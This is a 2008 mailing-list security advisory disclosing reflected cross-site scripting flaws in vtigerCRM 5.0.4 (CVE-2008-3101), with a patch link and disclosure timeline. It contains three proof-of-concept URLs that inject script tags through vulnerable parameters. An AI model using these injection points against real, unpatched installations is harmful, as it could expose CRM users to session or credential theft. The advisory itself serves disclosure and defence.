[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080901112401.4a51701a@mobile.fabian.datensalat.eu>
Date: Mon, 1 Sep 2008 11:24:01 +0200
From: Fabian Fingerle <fabian@...ensalat.eu>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: Multiple Cross Site Scripting (XSS)
Vulnerabilities in vtigerCRM 5.0.4, CVE-2008-3101
Multiple Cross Site Scripting (XSS) Vulnerabilities in vtigerCRM 5.0.4,
CVE-2008-3101
References
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3101
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3101
http://www.vtiger.de/
Description
vtigerCRM is a Open Source Customer Relationship Management (CRM)
Software. The application is vulnerable to simple Cross Site Scripting,
which can be used for several isues
Example
Assuming vtigerCRM is installed on http://localhost/vtigercrm/, one can
inject JavaScript with:
http://localhost/vtigercrm/index.php?module=Products&action=index&parenttab="><script>alert(1);</script>
http://localhost/vtigercrm/index.php?module=Users&action=Authenticate&user_password="><script>alert(1);</script>
http://localhost/vtigercrm/index.php?module=Home&action=UnifiedSearch&query_string="><script>alert(1);</script>
Workaround/Fix
vtiger CRM Security Patch for 5.0.4 [1]
Disclosure Timeline
2008-07-28 Vendor contacted
2008-07-28 Vendor fixed issue in test environment
2008-07-30 Vender released patch
2008-07-30 Vendor dev statet they'll release a second patch within days
2008-09-01 published advisory, no second patch from upstream yet
CVE Information
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-3101 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems. Credits and copyright
This vulnerability was discovered by Fabian Fingerle [2] (published with
help from Hanno Boeck [3]). It's licensed under the creative
commons attribution license [4].
Fabian Fingerle, 2008-09-01
[1] http://www.vtiger.de/vtiger-crm/downloads/patches.html?tx_abdownloads_pi1[action]=getviewdetailsfordownload&tx_abdownloads_pi1[uid]=128&tx_abdownloads_pi1[category_uid]=5&cHash=e16be773a5
[2] http://www.fabian-fingerle.de
[3] http://www.hboeck.de
[4] http://creativecommons.org/licenses/by/3.0/de/
--
_GPG_ 3D17 CAC8 1955 1908 65ED 5C51 FDA3 6A09 AB41 AB85
_chaos events near stuttgart_ www.datensalat.eu
Download attachment "signature.asc" of type "application/pgp-signature" (198 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists